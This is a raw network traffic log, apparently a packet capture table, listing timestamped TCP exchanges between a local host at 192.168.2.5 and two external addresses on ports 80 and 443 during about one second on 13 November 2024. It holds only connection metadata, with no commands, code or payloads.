Nov 13, 2024 20:39:45.498868942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498878002 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.498898983 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.498920918 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.503825903 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.503890991 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.570161104 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.570194960 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.570239067 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.570251942 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.570302010 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.570322037 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.572015047 CET	443	49905	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.572798014 CET	49905	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.572834969 CET	443	49905	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.573276043 CET	49905	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.573293924 CET	443	49905	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.656212091 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656229973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656241894 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656254053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656266928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656328917 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.656363010 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.656594992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656611919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656622887 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656635046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656646967 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656658888 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.656671047 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.656699896 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.657474041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.657515049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.685600996 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.685631037 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.685663939 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.685679913 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.685724974 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.685724974 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.700094938 CET	443	49905	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.700357914 CET	443	49905	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.700406075 CET	49905	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.700429916 CET	443	49905	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.700511932 CET	49905	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.700519085 CET	443	49905	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.700535059 CET	49905	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.700577021 CET	443	49905	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.703258038 CET	49910	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.703294992 CET	443	49910	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.703360081 CET	49910	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.703558922 CET	49910	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.703567028 CET	443	49910	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.743246078 CET	443	49908	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.743710995 CET	49908	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.743735075 CET	443	49908	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.744263887 CET	49908	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.744270086 CET	443	49908	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.756136894 CET	443	49907	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.756638050 CET	49907	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.756666899 CET	443	49907	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.757066011 CET	49907	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.757072926 CET	443	49907	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.773072004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.773143053 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.773159981 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.773169994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.773242950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.773255110 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.773267031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.773267031 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.773277044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.773296118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.773310900 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.773706913 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.773718119 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.773729086 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.773756027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.773787022 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.774091005 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.774102926 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.774116039 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.774127007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.774142981 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.774171114 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.800872087 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.800899982 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.800946951 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.800961971 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.800987005 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.801004887 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.813265085 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.813281059 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.813292027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.813366890 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.824116945 CET	443	49909	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.825931072 CET	49909	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.825931072 CET	49909	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.825949907 CET	443	49909	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.825962067 CET	443	49909	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.873373985 CET	443	49908	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.873516083 CET	443	49908	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.873804092 CET	49908	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.873909950 CET	49908	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.873924971 CET	443	49908	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.873935938 CET	49908	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.873944044 CET	443	49908	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.877176046 CET	49911	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.877211094 CET	443	49911	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.877451897 CET	49911	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.877451897 CET	49911	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.877489090 CET	443	49911	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.888355970 CET	443	49907	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.888549089 CET	443	49907	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.889152050 CET	49907	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.889187098 CET	49907	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.889205933 CET	443	49907	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.889219999 CET	49907	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.889226913 CET	443	49907	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.890104055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.890125036 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.890136003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.890239954 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.890240908 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.890244007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.890315056 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.890333891 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.890345097 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.890351057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.890374899 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.890402079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.890425920 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.891010046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.891050100 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.891062975 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.891185999 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.891185999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.891201973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.891212940 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.891309977 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.892627001 CET	49912	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.892663956 CET	443	49912	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.892798901 CET	49912	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.893508911 CET	49912	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.893527985 CET	443	49912	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.916271925 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.916300058 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.916384935 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.916400909 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.916738987 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.930938959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.930951118 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.930963993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.931030035 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.931071997 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.955866098 CET	443	49909	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.956063032 CET	443	49909	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.956120014 CET	443	49909	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.956190109 CET	49909	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.956229925 CET	49909	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.956247091 CET	443	49909	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.956274986 CET	49909	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.956285954 CET	443	49909	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.958808899 CET	49913	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.958899975 CET	443	49913	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.958987951 CET	49913	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.959103107 CET	49913	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.959141016 CET	443	49913	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.009691954 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009704113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009716034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009727001 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009737968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009747982 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009759903 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.009794950 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.009804010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009814978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009824038 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009833097 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009843111 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009852886 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.009881973 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.009896994 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.009896994 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.031863928 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.031929970 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.031960964 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.031991959 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.032020092 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.032200098 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.047970057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.048027039 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.048124075 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.048135042 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.048171043 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.048299074 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.048346043 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.140182018 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140237093 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140258074 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140269041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140286922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140299082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140315056 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.140388966 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.140578032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140589952 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140603065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140628099 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.140661955 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.140676975 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140688896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140700102 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.140738010 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.140769958 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.147075891 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.147108078 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.147202015 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.147202969 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.147273064 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.147471905 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.164433956 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.164453030 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.164462090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.164638996 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.164638996 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.192496061 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.192563057 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.192605019 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.192621946 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.192652941 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.192713976 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.241425037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.241445065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.241453886 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.241493940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.241506100 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.241518021 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.241530895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.241532087 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.241533041 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.241543055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.241568089 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.241592884 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.242193937 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.242212057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.242223978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.242264986 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.242264986 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.257273912 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.257323027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.257333040 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.257369041 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.257369995 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.257411957 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.257422924 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.257432938 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.257460117 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.257503033 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.281402111 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.281429052 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.281440020 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.281486034 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.281523943 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.307928085 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.307993889 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.308018923 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.308065891 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.308089018 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.308156967 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.358411074 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.358499050 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.358580112 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.358596087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.358606100 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.358618975 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.358629942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.358643055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.358644962 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.358658075 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.358669043 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.358699083 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.359432936 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.359513044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.359606028 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.359658957 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.375469923 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.375483036 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.375497103 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.375523090 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.375540018 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.375617027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.375627995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.375678062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.380625963 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.380693913 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.380705118 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.380724907 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.380749941 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.380769968 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.399056911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.399108887 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.399121046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.399161100 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.399182081 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.444412947 CET	443	49910	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.444925070 CET	49910	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.444941998 CET	443	49910	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.445426941 CET	49910	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.445430040 CET	443	49910	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.476984978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.477003098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.477016926 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.477047920 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.477093935 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.477108002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.477121115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.477159023 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.477484941 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.477498055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.477511883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.477525949 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.477545977 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.477572918 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.478004932 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.478018999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.478030920 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.478064060 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.478092909 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.492530107 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.492539883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.492589951 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.492613077 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.492651939 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.492970943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.492981911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.492994070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.493031025 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.493062019 CET	49873	80	192.168.2.5	185.215.113.206
